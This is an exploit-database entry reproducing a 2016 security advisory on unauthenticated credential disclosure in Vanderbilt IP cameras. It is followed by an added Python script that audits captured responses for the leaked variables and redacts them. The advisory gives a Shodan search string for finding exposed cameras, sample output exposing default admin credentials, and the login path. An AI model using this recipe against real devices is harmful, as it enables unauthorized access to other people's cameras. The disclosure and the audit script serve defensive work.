Vanderbilt IP Camera CCPW3025-IR / CVMW3025-IR - Credentials Disclosure

ID 1337DAY-ID-25274
Type zdt
Reporter Yakir Wizman
Modified 2016-08-19T00:00:00


Exploit for cgi platform in category web applications

1. Advisory Information
Title                   : Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) Remote Credentials Disclosure
Vendor Homepage         :
Remotely Exploitable    : Yes
Tested on Camera types  : CCPW3025-IR , CVMW3025-IR
Product References      :
+                       :
Vulnerability           : Username / Password Disclosure (Critical/High)
Shodan Dork             : title:"Vanderbilt IP-Camera"
Date                    : 19/08/2016
Author                  : Yakir Wizman (
This vulnerability was identified during a penetration test by Yakir Wizman.
3. Description
Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) allows an unauthenticated user to disclose the username and password remotely with a simple request made from a browser.
4. Proof-of-Concept:
Simply go to the following URL:
It should return JavaScript variables which contain the credentials and other configuration variables:
var Adm_ID="admin"; var Adm_Pass1="admin"; var Adm_Pass2="admin"; var Language="en"; var Logoff_Time="0";
Login @ http://host:port/cgi-bin/chklogin.cgi
Contact the vendor for further information regarding the proper mitigation of this vulnerability.
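
Added example (not part of the original advisory): a defender-side check that inspects a captured HTTP response body, for instance from a proxy log or an audit of your own cameras, for the credential variables shown in the proof-of-concept output above and reports them with the values redacted. The function names, severity labels and sample strings are assumptions constructed for illustration.

```python
import re

# Variable names taken from the advisory's sample response.
CREDENTIAL_VARS = ("Adm_ID", "Adm_Pass1", "Adm_Pass2")

# Matches: var NAME="value";  (straight or typographic quotes, both occur in captures)
_VAR_RE = re.compile(
    r'var\s+(\w+)\s*=\s*["\u201c\u201d]([^"\u201c\u201d]*)["\u201c\u201d]\s*;'
)


def parse_vars(body):
    """Return {name: value} for every `var NAME="value";` assignment in body."""
    return {name: value for name, value in _VAR_RE.findall(body)}


def audit_response(body, authenticated):
    """Classify one captured response body; return a finding dict or None."""
    found = parse_vars(body)
    leaked = [name for name in CREDENTIAL_VARS if name in found]
    if not leaked:
        return None
    passwords = {found[n] for n in leaked if n.startswith("Adm_Pass")}
    return {
        "leaked_vars": leaked,
        # Credentials served without a session are the condition the advisory describes.
        "severity": "review" if authenticated else "critical",
        # A password equal to the account name suggests factory defaults are still set.
        "default_like": found.get("Adm_ID") in passwords,
        # Never copy the secret into the report; keep only its length.
        "evidence": {n: "<redacted:%d chars>" % len(found[n]) for n in leaked},
    }


# Constructed samples mirroring the response format shown in the advisory.
SAMPLE = ('var Adm_ID="admin"; var Adm_Pass1="admin"; var Adm_Pass2="admin"; '
          'var Language="en"; var Logoff_Time="0";')
CLEAN = 'var Language="en"; var Logoff_Time="0";'

if __name__ == "__main__":
    print(audit_response(SAMPLE, authenticated=False))
    print(audit_response(CLEAN, authenticated=False))
```

A "critical" finding means the device should be taken off any untrusted network and its administrator password rotated once a vendor fix is in place.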
